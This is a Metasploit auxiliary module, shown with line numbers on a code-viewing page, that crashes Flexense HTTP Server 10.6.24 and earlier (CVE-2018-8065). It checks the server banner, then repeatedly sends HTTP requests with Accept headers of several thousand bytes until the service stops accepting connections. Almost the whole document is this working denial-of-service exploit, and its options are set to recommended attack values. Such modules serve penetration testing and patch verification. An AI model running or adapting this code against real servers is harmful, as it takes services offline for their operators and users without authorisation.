Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Auxiliary::Dos
8
  include Msf::Exploit::Remote::Tcp
9

10
  def initialize(info = {})
11
    super(update_info(info,
12
      'Name'           => 'Flexense HTTP Server Denial Of Service',
13
      'Description'    => %q{
14
        This module triggers a Denial of Service vulnerability in the Flexense HTTP server.
15
        Vulnerability caused by a user mode write access memory violation and can be triggered with
16
        rapidly sending variety of HTTP requests with long HTTP header values.
17

18
        Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below versions reportedly vulnerable.
19
      },
20
      'Author' 		=> [ 'Ege Balci <[email protected]>' ],
21
      'License'        => MSF_LICENSE,
22
      'References'     =>
23
        [
24
          [ 'CVE', '2018-8065'],
25
          [ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ],
26
        ],
27
      'DisclosureDate' => '2018-03-09'))
28

29
    register_options(
30
      [
31
        Opt::RPORT(80),
32
        OptString.new('PacketCount',     [ true, "The number of packets to be sent (Recommended: Above 1725)" , 1725 ]),
33
        OptString.new('PacketSize',      [ true, "The number of bytes in the Accept header (Recommended: 4088-5090"  , rand(4088..5090) ])
34
      ])
35

36
  end
37

38
  def check
39
    begin
40
      connect
41
      sock.put("GET / HTTP/1.0\r\n\r\n")
42
      res = sock.get
43
      if res and res.include? 'Flexense HTTP Server v10.6.24'
44
        Exploit::CheckCode::Appears
45
      else
46
        Exploit::CheckCode::Safe
47
      end
48
    rescue Rex::ConnectionRefused
49
      print_error("Target refused the connection")
50
      Exploit::CheckCode::Unknown
51
    rescue
52
      print_error("Target did not respond to HTTP request")
53
      Exploit::CheckCode::Unknown
54
    end
55
  end
56

57
  def run
58
    unless check == Exploit::CheckCode::Appears
59
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
60
    end
61

62
    size = datastore['PacketSize'].to_i
63
    print_status("Starting with packets of #{size}-byte strings")
64

65
    count = 0
66
    loop do
67
      payload = ""
68
      payload << "GET /" + Rex::Text.rand_text_alpha(rand(30)) + " HTTP/1.1\r\n"
69
      payload << "Host: 127.0.0.1\r\n"
70
      payload << "Accept: "+('A' * size)+"\r\n"
71
      payload << "\r\n\r\n"
72
      begin
73
        connect
74
        sock.put(payload)
75
        disconnect
76
        count += 1
77
        break if count==datastore['PacketCount']
78
      rescue ::Rex::InvalidDestination
79
        print_error('Invalid destination!  Continuing...')
80
      rescue ::Rex::ConnectionTimeout
81
        print_error('Connection timeout!  Continuing...')
82
      rescue ::Errno::ECONNRESET
83
        print_error('Connection reset!  Continuing...')
84
      rescue ::Rex::ConnectionRefused
85
        print_good("DoS successful after #{count} packets with #{size}-byte headers")
86
        return true
87
      end
88
    end
89
    print_error("DoS failed after #{count} packets of #{size}-byte strings")
90
  end
91
end
92

93